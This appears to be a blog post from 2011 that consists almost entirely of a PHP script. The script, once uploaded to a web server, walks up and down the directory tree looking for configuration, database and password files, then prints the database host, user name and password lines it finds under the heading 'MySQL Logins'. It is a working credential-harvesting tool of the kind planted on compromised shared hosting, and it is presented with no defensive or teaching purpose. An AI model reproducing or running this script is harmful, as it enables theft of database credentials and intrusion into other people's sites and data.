<?php $backwards_depth = 2; // how many directories to step backwards $forward_depth = 4; // amount of dirs to recursively search forwards backstep($backwards_depth); getMysql($forward_depth); function backstep($amount) { for($i = 0; $i < $amount; $i++) { if(@is_readable("..")) chdir(".."); else return $i; } } function getMysql($depth) { echo "<h3>MySQL Logins:</h3>"; // hail the almighty regular expression $files = findFile($depth, getcwd(), "*config*|*.conf|*database*|*passwd*|*password*", ".gif|.jpg|.png|.htm|.js|template|forgot|remind|new|change|lib|sample|install", "read"); foreach($files as $path) { $dbinfo = false; $contents = file($path); foreach($contents as $line) { $line = trim($line); // make sure its useful and remove comments if($line[0] != '$' && strpos(strtolower($line), "define(") === false) continue; if(strpos($line, "//") !== false) $line = substr($line, 0, strpos($line, "//")); else if(strpos($line, "/*") !== false) $line = substr($line, 0, strpos($line, "/*")); else if(strpos($line, "#") !== false) $line = substr($line, 0, strpos($line, "#")); // parse out the db info if(strpos(strtolower($line), "host") !== false) $dbinfo .= $line.'<br>'; else if(strpos(strtolower($line), "user") !== false) $dbinfo .= $line.'<br>'; else if(strpos(strtolower($line), "pass") !== false) $dbinfo .= $line.'<br>'; } if($dbinfo != false) echo "<font color=green>".$path."</font>:<br>".$dbinfo.'<br>'; } } function findFile($find_depth, $find_startfrom, $find_query, $find_reject, $find_perms) { $startdir = getcwd(); chdir($find_startfrom); if($find_query == "") return -1; else { $query = explode("|", $find_query); $query_len = count($query) - 1; } if($find_reject == "") $reject_len = -1; else { $reject = explode("|", $find_reject); $reject_len = count($reject) - 1; } if($find_perms == "read") $perms = 0; else if($find_perms == "write") $perms = 1; else if($find_perms == "execute") $perms = 2; else if($find_perms == "setuid") $perms = 3; $depth_dir = ""; $matches; $match = true; $x = 0; while($x <= $find_depth) { $y = 0; while($y <= $query_len) { $search = $depth_dir.$query[$y]; $files = glob($search); if(!is_array($files)) break; foreach($files as $possible_file) { if($reject_len != -1) { $z = 0; while($z <= $reject_len) { if(strpos($possible_file, $reject[$z])) { $match = false; break; } $z++; } } if($perms == 0) if(!is_readable($possible_file)) $match = false; else if($perms == 1) if(!is_writeable($possible_file)) $match = false; else if($perms == 2) if(!is_executable($possible_file)) $match = false; else if($perms == 3) { $setuid = floor(fileperms($possible_file) / 1000); if(!is_executable($possible_file)) $match = false; if($setuid != 1 && $setuid != 2 && $setuid != 4 && $setuid != 6) $match = false; } if($match == true) $matches[] = $find_startfrom.DIRECTORY_SEPARATOR.$possible_file; $match = true; } $y++; } $x++; $depth_dir .= '*'.DIRECTORY_SEPARATOR; } chdir($startdir); return $matches; } ?>
©2011, copyright BLACK BURN
0 comments:
Post a Comment